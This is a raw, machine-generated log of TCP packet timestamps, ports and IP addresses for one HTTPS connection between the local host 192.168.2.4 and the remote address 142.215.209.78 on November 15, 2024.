Nov 15, 2024 18:14:13.189964056 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.190371037 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.190448999 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.190478086 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.190805912 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.190896034 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.190926075 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.190987110 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.191056013 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.191081047 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.191592932 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.191674948 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.191708088 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.191802025 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.191869974 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.191889048 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.192569017 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.192648888 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.192675114 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.192778111 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.192857027 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.192881107 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.192991018 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.193064928 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.193094015 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.193595886 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.193664074 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.193677902 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.193804026 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.193867922 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.193882942 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.194602013 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.194675922 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.194695950 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.194837093 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.194905996 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.194916964 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.195544004 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.195622921 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.195640087 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.195723057 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.195780993 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.195797920 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.196167946 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.196374893 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.196383953 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.196396112 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.196464062 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.196479082 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.196527958 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.196577072 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.196649075 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.196660995 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.197175026 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.197248936 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.197268009 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.197401047 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.197463989 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.197475910 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.197630882 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.197802067 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.197819948 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.198108912 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.198172092 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.198188066 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.198292017 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.198353052 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.198365927 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.198885918 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.198961020 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.198975086 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.199090004 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.199151039 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.199163914 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.199229002 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.199292898 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.199306011 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.199774981 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.199841022 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.199856043 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.199984074 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.200047970 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.200059891 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.200525999 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.200591087 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.200604916 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.200721979 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.200783014 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.200797081 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.200910091 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.200969934 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.200982094 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.201565027 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.201636076 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.201656103 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.201716900 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.201775074 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.201791048 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.201899052 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.201961040 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.201976061 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.202442884 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.202508926 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.202521086 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.202949047 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.203012943 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.203027964 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.203057051 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.203126907 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.203140020 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.203241110 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.203304052 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.203329086 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.203643084 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.203704119 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.203713894 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.203882933 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.203937054 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.203946114 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.203955889 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.203996897 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.204617023 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.204667091 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.204680920 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.204694986 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.204719067 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.232947111 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.233109951 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.233141899 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.276798010 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.307311058 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.307619095 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.307655096 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.307861090 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.307948112 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.307959080 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.307975054 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.308060884 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.308068991 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.308531046 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.308609009 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.308623075 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.308784962 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.308856010 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.308872938 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.309175968 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.309262991 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.309277058 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.309626102 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.309696913 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.309699059 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.309710979 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.309772968 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.309787989 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.309843063 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.310030937 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.310108900 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.310121059 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.310306072 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.310369968 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.310383081 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.311005116 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.311048031 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.311085939 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.311099052 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.311127901 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.311502934 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.311573982 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.311588049 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.311928034 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.312001944 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.312016010 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.312174082 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.312238932 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.312252998 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.312329054 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.312395096 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.312407017 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.313085079 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.313159943 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.313173056 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.313280106 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.313327074 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.313354015 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.313368082 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.313394070 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.314192057 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.314263105 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.314275026 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.314347982 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.314430952 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.314445972 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.314462900 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.314513922 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.314526081 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.315040112 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.315112114 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.315125942 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.315220118 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.315263033 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.315287113 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.315299988 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.315356970 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.315922022 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.316000938 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.316015959 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.316168070 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.316211939 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.316236973 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.316248894 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.316277981 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.316313028 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.316382885 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.316397905 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.316982985 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.317028046 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.317068100 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.317080021 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.317109108 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.317286968 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.317363977 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.317378044 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.317900896 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.317945957 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.317979097 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.317991972 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.318020105 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.318216085 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.318264008 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.318288088 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.318301916 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.318331957 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.318941116 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.319015980 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.319029093 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.319118023 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.319171906 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.319190025 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.319202900 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.319236994 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.319797039 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.319852114 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.319879055 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.319894075 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.319922924 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.320090055 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.320158005 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.320173979 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.320194006 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.320269108 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.320281982 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.320784092 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.320852995 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.320868015 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.320969105 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.321038008 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.321050882 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.321083069 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.321147919 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.321160078 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.321782112 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.321840048 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.321858883 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.321871042 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.321911097 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.350897074 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.351170063 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.351202965 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.401679039 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.434648991 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.434695959 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.434778929 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.434829950 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.434843063 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.434863091 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.434904099 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.434912920 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.434921026 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.434983969 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.434992075 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.435039997 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.435302019 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.435375929 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.435383081 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.435493946 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.435559034 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.435564041 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.435693979 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.435755014 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.435762882 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.436115980 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.436176062 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.436182022 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.436270952 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.436328888 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.436337948 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.436502934 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.436561108 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.436568022 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.436947107 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.437009096 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.437015057 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.437149048 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.437207937 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.437216043 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.437319040 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.437376976 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.437383890 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.437489986 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.437549114 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.437556028 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.438019991 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.438079119 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.438087940 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.438194990 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.438252926 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.438261032 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.438391924 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.438448906 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.438457966 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.438877106 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.438934088 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.438942909 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.439090014 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.439148903 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.439157009 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.439291954 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.439344883 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.439352989 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.439467907 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.439527988 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.439538002 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.440020084 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.440080881 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.440088034 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.440212965 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.440268993 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.440275908 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.440413952 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.440473080 CET	49731	443	192.168.2.4	142.215.209.78
